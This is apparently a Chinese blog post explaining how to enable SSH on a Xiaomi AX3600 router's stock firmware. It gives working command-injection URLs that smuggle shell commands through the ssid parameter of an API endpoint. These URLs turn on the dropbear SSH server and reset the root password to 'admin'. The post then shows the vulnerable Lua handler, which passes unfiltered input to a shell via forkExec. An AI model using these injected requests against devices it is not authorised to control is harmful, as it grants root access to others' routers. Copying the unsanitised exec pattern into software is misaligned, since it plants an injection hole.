小米路由器AX3600官方固件开启SSH方法

1. 下载固件

AX3600

2. 登录管理页面

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router

3. 打开 SSH (替换Token)

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

4. 更新root帐号密码为admin

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

5. 禁用路由器固件更新,否则自动更新后会失效

开启SSH原理

function setConfigIotDev()
    local XQFunction = require("xiaoqiang.common.XQFunction")
    local LuciUtil = require("luci.util")
    local result = {
        ["code"] = 0
    }
    local ssid = LuciHttp.formvalue("ssid")  ----参数直接代入,未过滤
    local bssid = LuciHttp.formvalue("bssid")----参数直接代入,未过滤
    local uid = LuciHttp.formvalue("user_id")----参数直接代入,未过滤
    XQLog.log(debug_level, "ssid = "..ssid)
    XQLog.log(debug_level, "bssid = "..bssid)
    XQLog.log(debug_level, "uid = "..uid)
    if XQFunction.isStrNil(ssid)
        or XQFunction.isStrNil(bssid)
        or XQFunction.isStrNil(uid) then
        result.code = 1523
    end
    if result.code ~= 0 then
        result["msg"] = XQErrorUtil.getErrorMessage(result.code)
    else
        XQFunction.forkExec("connect -s "..ssid.." -b "..bssid.. " -u "..uid)----参数直接代入,未过滤
    end
    LuciHttp.write_json(result)
end
This entry was posted in Xiaomi and tagged . Bookmark the permalink.

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.